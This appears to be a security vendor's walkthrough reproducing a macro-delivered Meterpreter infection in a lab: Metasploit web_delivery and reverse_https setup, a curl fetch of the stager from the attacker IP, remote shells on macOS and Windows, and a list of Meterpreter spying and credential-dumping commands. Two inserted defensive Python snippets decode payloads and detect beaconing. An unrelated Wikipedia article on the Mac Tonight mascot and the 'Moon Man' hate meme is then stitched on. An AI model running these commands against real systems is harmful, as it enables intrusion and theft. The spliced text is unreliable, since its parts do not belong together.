In the blog we posted on March 22, FortiGuard Labs introduced a new Word Macro malware sample that targets both Apple Mac OS X and Microsoft Windows. After deeper investigation of this malware sample, we can confirm that after a successful infection the post-exploitation agent Meterpreter is run on the infected Mac OS X or Windows system. Meterpreter is part of the Metasploit framework. More information about Meterpreter can be found here.
For this to work, the attacker's server must be running Metasploit as the controller to control the infected systems. Since the attacker's server doesn't currently respond to any requests, we decided to set up our own Metasploit server to confirm our observation.
This blog provides a walk-through of the attack process with the server we set up, and shows what an attacker can do on an infected system.
Testing Environment
The testing environment consists of three virtual machines running 64-bit Windows 7, 64-bit Mac OS X, and 64-bit Kali Linux, respectively. The Windows 7 machine acts as an infected Windows system, the Mac OS X machine acts as an infected Mac OS X system, and the Kali Linux VM acts as the attacker's server running Metasploit.
Following are the IP addresses of these virtual machines.
Windows 7: 192.168.71.127
Mac OS X: 192.168.71.128
Kali Linux: 192.168.71.129
Setting Up the Metasploit
First, on the Kali Linux VM (which has Metasploit installed), we created a new script file containing the commands required to set up Metasploit.
Figure 1 – The content of the script file
Typing 'msfconsole -q -r osx_meterpreter_test' executes Metasploit in quiet mode (-q) and loads the script file (-r) provided.
Figure 2 – Running Metasploit
Once the settings are loaded, running the command show options shows the current Metasploit configuration for the session.
Our test uses two Metasploit components. The first is the web_delivery module, and the second is the payload reverse_https.
The SRVHOST and LHOST parameters are set to the Kali Linux VM's IP address (192.168.71.129). This address acts both as the listener for the connect-back connection, on TCP/443 (LPORT), and as the server that delivers the reverse_https payload, on TCP/8080 (SRVPORT).
The show options command hides certain settings that can only be viewed with the show advanced command. The only setting that is not shown is StagerVerifySSLCert, which we set to false. That prevents the validity of the SSL certificate from being verified while establishing secure communications.
Figure 3 – Showing the options set for the attack
The next step is to execute the run command, which starts the HTTPS reverse handler/server so it is ready for victims to connect. See Figure 4. A piece of Python script code is then generated for infected systems to run.
Figure 4 – Running the attack
Instead of directly executing this code on the victim's machine, however, an HTTPS request is made to see what data the server will reply with. Typing curl -k https://192.168.71.129:8080/, we can see that a chunk of Python script code has been received.
Figure 5 – The Python script code returned to victim
If we compare the code structure between the code found in the malicious Macro and the one generated by Metasploit in the previous step, it is easy to visually identify the same elements (highlighted in yellow), but obviously the base64 data is different.
The next step is to decode the base64 data to reveal the code that will be executed on the victim's machine. To do that, a call to the base64 tool is more than enough, and can be done inside the Metasploit prompt as well.
The command syntax is: echo '
Figure 6 – Decoding the base64 data
In the malware sample, the base64 decoded data is passed to the ExecuteForOSX() function (on the left side of the table). Again, through a comparison between that code and the code generated by Metasploit, we can see that they are the same, apart from the URL, which is different.
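For triage, the same decoding step can be done statically, so the decoded text and any connect-back URL are recovered without running anything. The following is an added example, not code from the original post or from Metasploit; the sample one-liner, its harmless inner text and the names decode_layers, B64_LITERAL and URL are constructed for illustration. It generalizes slightly by peeling nested base64 layers.

```python
import ast
import base64
import binascii
import re

# Quoted runs of base64 alphabet long enough to be an embedded payload.
B64_LITERAL = re.compile(r"""['"]([A-Za-z0-9+/]{16,}={0,2})['"]""")
URL = re.compile(r"""https?://[^\s'"\\)>]+""")

# Constructed sample: only the outer shape (exec of a base64-decoded string)
# follows the post. The inner text is a harmless assignment holding the lab
# address, not real stager code.
_INNER = "u = 'https://192.168.71.129:443/constructed-path'\n"
SAMPLE = (
    "import base64; exec(base64.b64decode('"
    + base64.b64encode(_INNER.encode()).decode()
    + "'))"
)


def _parses(src):
    """True if the text is syntactically valid Python 3 (it is never run)."""
    try:
        ast.parse(src)
        return True
    except (SyntaxError, ValueError):
        return False


def decode_layers(text, max_depth=3):
    """Statically peel base64 string literals and collect URLs per layer."""
    findings = []
    queue = [(text, 0)]
    while queue:
        current, depth = queue.pop(0)
        if depth >= max_depth:
            continue  # stop on deliberately deep nesting
        for match in B64_LITERAL.finditer(current):
            try:
                raw = base64.b64decode(match.group(1), validate=True)
                decoded = raw.decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # a long identifier or binary data, not encoded text
            findings.append({
                "depth": depth + 1,
                "decoded": decoded,
                "urls": URL.findall(decoded),
                # Python 2 era code may legitimately fail to parse here.
                "parses_as_python3": _parses(decoded),
            })
            queue.append((decoded, depth + 1))
    return findings


if __name__ == "__main__":
    for layer in decode_layers(SAMPLE):
        print(layer["depth"], layer["urls"])
```

The URLs it returns are the values to compare between samples and to search for in proxy and DNS logs.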
Demonstrating the attack on Mac OS X
Next, on the Mac OS X machine, we create a new file with the name 'osx_meterpreter.py' that includes the code above (on the right side) generated by Metasploit. It is then executed by calling the Python interpreter with the script as a parameter.
Figure 7 – Running the Python script on the Mac OS X machine
We can now see that the script is executed without any issue. Great!
Going back to the Metasploit prompt on the Kali Linux VM, we can see that a meterpreter session has been opened. The sessions command can be run to see the current meterpreter session. The output shows an active session with the type 'meterpreter python/osx', which confirms that the session has been established correctly.
Figure 8 – The Meterpreter session is opened
The command sessions -i 1 is now run to start interaction with the session, so the meterpreter prompt is given. The first command we execute is the meterpreter command called sysinfo, which collects information from the remote infected system, as shown in Figure 9. For this scenario, it shows information from the compromised Mac OS X machine.
Figure 9 – Getting the sys info of the infected Mac OS X
Now, to be a bit more adventurous, the shell command is executed. This command starts a shell on the remote compromised system that can be controlled locally. A 'sh-3.2' prompt appears, and from here any OS command we type is run on the remote machine. The id command is executed showing the user's id, which in this case is the 'root' user.
Figure 10 – Getting the shell of the infected Mac OS X
It is also worth mentioning that, even if the Metasploit server goes down, the Python process running on the victim's machine stays alive and keeps trying to connect back until the server comes back up. Once this happens, the victim's machine is automatically connected and establishes a session with the server.
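That retry behaviour leaves a pattern in connection telemetry: one process failing against the same destination at a steady interval, then succeeding. The following detection sketch is an added example, not part of the original post; the log format, host and process names, timestamps, retry interval and thresholds are all constructed assumptions.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed connection log (format and values are assumptions).
LOG = """\
2024-01-01T10:00:00Z host=osx-vm proc=python dst=192.168.71.129:443 result=refused
2024-01-01T10:00:00Z host=osx-vm proc=softwareupdate dst=198.51.100.7:443 result=refused
2024-01-01T10:00:02Z host=osx-vm proc=softwareupdate dst=198.51.100.7:443 result=refused
2024-01-01T10:00:03Z host=osx-vm proc=Safari dst=203.0.113.10:443 result=refused
2024-01-01T10:00:04Z host=osx-vm proc=Safari dst=203.0.113.10:443 result=ok
2024-01-01T10:00:05Z host=osx-vm proc=python dst=192.168.71.129:443 result=refused
2024-01-01T10:00:10Z host=osx-vm proc=python dst=192.168.71.129:443 result=refused
2024-01-01T10:00:15Z host=osx-vm proc=python dst=192.168.71.129:443 result=refused
2024-01-01T10:00:21Z host=osx-vm proc=python dst=192.168.71.129:443 result=refused
2024-01-01T10:00:26Z host=osx-vm proc=python dst=192.168.71.129:443 result=ok
2024-01-01T10:03:40Z host=osx-vm proc=softwareupdate dst=198.51.100.7:443 result=refused
2024-01-01T10:09:00Z host=osx-vm proc=softwareupdate dst=198.51.100.7:443 result=refused
""".splitlines()


def parse(line):
    """Split 'timestamp key=value ...' into (datetime, dict)."""
    ts, *fields = line.split()
    kv = dict(field.split("=", 1) for field in fields)
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), kv


def _score(key, run, connected_at, min_failures, max_jitter):
    """Turn one streak of failures into an alert if it is long and regular."""
    if len(run) < max(min_failures, 2):
        return None
    gaps = [(b - a).total_seconds() for a, b in zip(run, run[1:])]
    jitter = pstdev(gaps) / mean(gaps)  # 0 means perfectly periodic retries
    if jitter > max_jitter:
        return None  # irregular failures look like ordinary network trouble
    host, proc, dst = key
    return {"host": host, "proc": proc, "dst": dst, "failures": len(run),
            "period_s": round(mean(gaps)), "connected_at": connected_at}


def find_retry_beacons(lines, min_failures=4, max_jitter=0.25):
    """Flag (host, process, destination) flows that retry at a steady rate."""
    flows = defaultdict(list)
    for line in lines:
        if line.strip():
            ts, kv = parse(line)
            flows[(kv["host"], kv["proc"], kv["dst"])].append((ts, kv["result"]))
    alerts = []
    for key, events in flows.items():
        events.sort()
        run = []  # timestamps of the current streak of failed attempts
        for ts, result in events:
            if result != "ok":
                run.append(ts)
                continue
            alert = _score(key, run, ts, min_failures, max_jitter)
            if alert:
                alerts.append(alert)
            run = []
        # A streak with no success yet: the server is still unreachable.
        alert = _score(key, run, None, min_failures, max_jitter)
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for alert in find_retry_beacons(LOG):
        print(alert)
```

An alert whose connected_at is set marks the moment the session was established, which is the starting point for scoping what happened on the host afterwards.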
Demonstrating the attack on Windows 7
On the Windows 7 machine, the first thing we do is to modify the file 'hosts,' as shown below, which you can find in '%SystemRoot%\System32\drivers\etc'. This file is used to map host names to IP addresses.
Figure 11 – Modifying the 'hosts' file
As a result, all the request packets directed to pizza.vvlxpress.com will be sent to the Kali Linux machine (192.168.71.129). We then let the 64-bit DLL restore to run inside the powershell.exe process. It will connect to the Kali Linux running Metasploit.
When going back to the Metasploit prompt on the Kali Linux, we see that a meterpreter session has been opened. We then use the sessions command to see the current meterpreter session. The output shows that there's an active session with the type 'meterpreter x64/windows'. The sysinfo command then shows the sys info of the infected Windows system. See Figure 12.
Figure 12 – Getting the sys info of the infected Windows 7 device
After the connection is established, we next check the victim's system information. See Figure 13. We are able to compare it with the information we got in Metasploit (Figure 12.)
Figure 13 – The info of the infected Windows
We then execute the shell command to take control of the infected Windows machine. Figure 14 shows the output of executing the dir command after we get the shell.
Figure 14 – Getting the shell of the infected Windows machine
From here, you can execute any command you want on the infected Windows machine.
As you have probably noticed, the output of the shell command contains a line reading 'Process 1172 created.' This means that a new cmd.exe with process id 1172 was run on the infected system, which is used to handle commands from the server.
Figure 15 – A new 'cmd.exe' process is created
Conclusion
Based on FortiGuard Labs' analysis and testing, we can confirm the following:
- Meterpreter was used for post-exploitation by the attacker
- The web_delivery module was used by the attacker
- The reverse_https payload was used by the attacker for secure communication
This walk-through shows how this malware is able to take control of the infected system. Once the meterpreter session is established, the attacker can get the sys info of the infected system and execute commands on the infected system.
In fact, meterpreter is a very powerful tool for post-exploitation. In the Appendix, below, you can see the commands it supports. This helps you imagine how serious the consequences of such an attack can be if your system is infected by this malware.
Appendix
The commands that meterpreter supports:
Stdapi: File system Commands
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system's local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Priv: Elevate Commands
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
Command Description
------- -----------
timestomp Manipulate file MACE attributes
Mac Tonight | |
---|---|
Mac Tonight animatronic at Solid Gold McDonald's in Greenfield, Wisconsin | |
First appearance | 1986 |
Created by | Davis, Johnson, Mogul & Colombatto |
Portrayed by | Doug Jones (1986–1997) |
Voiced by | Roger Behr (1986–1990) |
In-universe information | |
Gender | Male |
Occupation | Nighttime mascot for the McDonald's fast food restaurant chain |
Mac Tonight is a fictional character used in the marketing for McDonald's restaurants during the mid-1980s. Known for his crescent moon head, sunglasses and piano-playing, the character used the song 'Mack the Knife' which was made famous in the United States by Bobby Darin. Throughout the campaign, Mac was performed by actor Doug Jones in his fourth Hollywood job and voiced by Roger Behr.
Originally conceived as a promotion to increase dinner sales by Southern California licensees, Mac Tonight's popularity led McDonald's to take it nationwide in 1987. Although McDonald's ceased airing the commercials and retired the character after settling a lawsuit brought by Darin's estate in 1989, the company reintroduced the character nineteen years later throughout Southeast Asia in 2007.
History
Original marketing campaign (1986–1989)
The campaign was created locally for California McDonald's franchisees by Los Angeles advertising firm Davis, Johnson, Mogul & Colombatto.[1] Looking to increase the after-4 p.m. dinner business, the agency was inspired by the song 'Mack the Knife' by Kurt Weill and Bertolt Brecht, which was made famous in the United States by Bobby Darin in 1959. The agency listened to different versions of it before opting to create an original version with new lyrics.[1] After deciding not to feature real people or celebrities, the designers settled on an anthropomorphic crooner moon on a man's body with 1950s-style sunglasses; the song and style were designed to appeal to baby boomers and a revival of 1950s-style music in popular culture.[1] The character, who played a grand piano atop either a floating cloud or a giant Big Mac (hence the name), was intended to garner a 'cult-like' following, e.g. Max Headroom.[1]
From 1986 to 1987, the campaign expanded to other cities on the American West Coast. McDonald's said that the campaign had 'great success' while trade magazine Nation's Restaurant News announced that it had contributed to increases of over 10% in dinnertime business at some Californian restaurants.[1] A crowd of 1,500 attended the visit of a costumed character to a Los Angeles McDonald's.[1] Despite concerns that he was too typical of the West Coast, in February 1987 it was decided that the character would feature on national advertisements which went to air that September and he attracted a crowd of 1,000 in Boca Raton, Florida.[1] During this period, Happy Meal toys modeled after the character were also released at participating McDonald's restaurants.[2] A September 1987 survey by Ad Watch found that the number of consumers who recalled McDonald's advertising before any other doubled from the previous month, and was higher than any company since the New Coke launch in 1985.[1]
Doug Jones performed Mac Tonight for over 27 commercials for three years. Years later in 2013, he recalled '[T]hat's when my career took a turn that I was not expecting. I didn't know that was a career option.'[3] Mac Tonight's voice was provided by Roger Behr.[4] Director Peter Coutroulis, who won a Clio Award for a previous campaign for Borax, pitched several commercials which did not air, including an E.T.-like one in which two astronomers watch Mac Tonight drive his Cadillac through the sky.[1]
In 1989, Bobby Darin's son Dodd Mitchell Darin claimed that the song infringed upon his father's trademark without prior permission and filed a lawsuit as well as an injunction for the song to be removed from both TV and radio ads.[5] As a response to the lawsuit, McDonald's stopped airing the commercials and retired the character after nearly four years of usage.
Reintroduction in Southeast Asia (2007)
In 2007, McDonald's brought back the character in territories throughout Southeast Asia such as in Singapore, Malaysia, Indonesia and the Philippines.[6] The new Asian-exclusive campaign featured a CGI-animated Mac Tonight dancing atop a McDonald's restaurant while singing and playing a saxophone rather than a grand piano as he played in the original advertising campaign in the United States.[7]
Animatronics
In addition to the advertising campaign, a number of McDonald's restaurants during the early 1990s were also fitted with Mac Tonight animatronic figures which featured the character seated in front of a piano and playing it.[8] The only prominent McDonald's restaurant to still feature one of the animatronics is the World's Largest Entertainment McDonald's in Orlando, Florida.[9] Other known locations include a Greenfield, Wisconsin McDonald's known as the Solid Gold McDonald's, prior to undergoing major renovations in 2011.[10]
NASCAR
Between 1997 and 1998, McDonald's sponsored NASCAR Hall of Famer Bill Elliott with Mac Tonight featured on his car.[11] In 2016, the Mac Tonight theme was McDonald's driver Jamie McMurray's Chip Ganassi Racing No. 1 Chevrolet SS throwback scheme for Darlington Raceway's Southern 500.[12]
Legacy
Mac Tonight has appeared on the cover of Saint Pepsi's album Late Night Delight (with Luxury Elite)[13][14] and in an episode of The Simpsons, 'Kiss Kiss, Bang Bangalore'.[2]
Moon Man
Moon Man is an unofficial parody of Mac Tonight in which the character is depicted as advocating for racism, white supremacy, antisemitism, neo-Nazism, terrorism, race war and genocide. The character originated in 2007 when Internet user 'farkle' created a site on the Internet community YTMND, which showed a video loop of Mac Tonight with the reggaeton song 'Chacarron Macarron' by El Chombo in the background. Using a text-to-speech program by AT&T, more Moon Man pages were created, some of which included the program uttering 'KKK' (a nod to the Ku Klux Klan) repeatedly in the background audio. Other users made Moon Man sing and rap. The first such video had him performing 'Money in the Bank' by Lil Scrappy with few lyrical changes apart from Moon Man's name being inserted into the song and a chorus chanting for the Ku Klux Klan ('KKK, KKK, KKK'). Further videos were made portraying Moon Man as a racist.[6]
In 2008, the YTMND Moon Man group was created to make and spread Moon Man content on YTMND. On October 2, 2008, a racist parody of 'Hypnotize' by the Notorious B.I.G., commonly known as 'Notorious KKK', was created by YTMND user MluMluxMlan. It gained over 119,000 views over the next seven years. In 2015, the character spread to websites such as 4chan and 8chan, as part of the alt-right movement. New songs were made supporting police brutality and celebrating the Orlando nightclub shooting.[6] On June 1, 2015, an album of Moon Man songs was released under the title WhiteTopia with the YouTube version accumulating 130,000 views.[citation needed]
Reception and impact
Salon compared Moon Man to Pepe the Frog, another meme labeled as a hate symbol.[6] Moon Man also appeared in the background of a billboard in support of the Donald Trump 2016 presidential campaign for which far-right activist Charles C. Johnson raised funds to place in the swing state of Pennsylvania, depicting Pepe the Frog as Donald Trump guarding the wall on the Mexico–United States border.[15]
YouTube consistently removes Moon Man videos for violating its community guidelines on hate speech, and AT&T has edited its text-to-speech software to filter out the character's name and obscenities.[6] On September 26, 2019, the Anti-Defamation League added Moon Man to their database of hate symbols.[16][17][18]
The racist and antisemitic terrorist behind the Halle synagogue shooting used the meme before his attack. He published a selfie on 8. 8. 2019, showing him in uniform and wearing a 'Moon Man' button. The BKA investigators initially did not classify the picture as ideological due to ignorance and assigned it to the right-wing extremist online community.[19]
References
- Prescott, Eileen (November 29, 1987). 'The Making of 'Mac Tonight''. The New York Times. Retrieved February 28, 2015.
- Burke, Timothy (December 22, 2014). 'Rape, Murder, Violent Racism: The Weirdest McDonald's Ad Campaign Ever'. Deadspin. Retrieved July 28, 2015.
- Radish, Christina (June 26, 2013). 'Doug Jones Talks FALLING SKIES Season 3, the Makeup Process, His Career, His Desire to Make HELLBOY 3, and More'. Collider. Retrieved December 2, 2015.
- 'Roger Behr'. Patterson & Associates. Archived from the original on June 19, 2005.
- 'Darin's Son Sues McDonald's'. Deseret News. October 15, 1989. Retrieved August 30, 2012.
- Sheffield, Matthew (October 25, 2016). 'Meet Moon Man: The alt-right's racist rap sensation, borrowed from 1980s McDonald's ads'. Salon. Archived from the original on January 29, 2019. Retrieved January 31, 2019.
- Mac Tonight commercial in Southeast Asia (commercial). McDonald's Corporation. 2007.
- Ocker, J.W. (March 21, 2012). 'Mac Tonight'. Odd Things I've Seen. Retrieved July 12, 2018.
- Kubersky, Seth (March 16, 2016). 'World's Largest Entertainment McDonald's reopens on International Drive'. Attractions Magazine. Retrieved July 12, 2018.
- Snyder, Molly (March 28, 2011). 'So long, Solid Gold McDonald's'. OnMilwaukee. Retrieved September 6, 2018.
- 'Driver Bill Elliott 1997 NASCAR Winston Cup Results'. Racing-Reference.info. Retrieved December 2, 2015.
- Jensen, Tom (August 15, 2016). 'Jamie McMurray unveils 'Mac Tonight' Darlington throwback scheme'. FoxSports.com. Archived from the original on August 15, 2016. Retrieved August 30, 2016.
- Beauchamp, Scott (August 18, 2016). 'How Vaporwave Was Created Then Destroyed by the Internet'. Esquire. Archived from the original on August 19, 2016. Retrieved August 26, 2016.
- Minor, Jordan (May 19, 2016). 'McDonald's Mac Tonight should make a comeback as the lead in a fast food cinematic universe'. Geek.com. Archived from the original on May 20, 2016. Retrieved August 25, 2016.
- Kavanaugh, Shane Dixon (October 6, 2016). 'Trump-Inspired Pepe The Frog Billboards To Hit Battleground State'. Vocativ. Archived from the original on November 27, 2016. Retrieved November 26, 2016.
- ''OK' and Other Alt Right Memes and Slogans Added to ADL's Hate Symbols Database' (Press release). New York City: Anti-Defamation League. September 26, 2019. Retrieved December 29, 2019.
- Allyn, Bobby (September 26, 2019). 'The 'OK' Hand Gesture Is Now Listed As A Symbol Of Hate'. Boise State Public Radio. Retrieved November 16, 2019.
- Kunzelman, Michael (September 26, 2019). ''OK' hand gesture, 'Bowlcut' added to hate symbols database'. Associated Press. Retrieved November 24, 2020.
- 'Die Erkenntnisse aus dem Halle-Prozess'. tagesschau.de.